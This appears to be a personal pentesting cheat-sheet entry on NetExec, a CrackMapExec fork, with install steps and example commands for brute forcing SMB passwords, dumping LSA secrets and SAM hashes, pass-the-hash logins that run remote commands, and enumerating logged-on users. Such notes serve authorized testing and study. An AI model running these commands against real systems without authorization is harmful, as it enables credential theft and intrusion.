NetExec

NetExec or NXC (1.6k ⭐) is a fork of CrackMapExec which is now archived. It can be used to brute force network services passwords.

The wiki further lists everything else you can do.

$ sudo apt install pipx git
$ pipx ensurepath
$ pipx install git+https://github.com/Pennyw0rth/NetExec

Example usage:

$ nxc smb IP -u 'username' -p password.list
$ nxc smb IP --local-auth -u 'xxx' -p 'yyy' --lsa
$ nxc smb IP --local-auth -u 'xxx' -p 'yyy' --sam
$ nxc smb IP -u 'xxx' -d . -H hash -x whoami

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • --continue-on-success
  • --local-auth: non-domain joined
$ nxc smb 10.10.110.17 IP -u 'username' -p 'password' -x 'whoami' --exec-method smbexec
$ nxc smb 10.10.110.17 IP -u 'username' -p 'password' -X 'whoami' --exec-method smbexec
$ nxc smb 10.10.110.17 IP -u 'username' -p 'password' --loggedon-users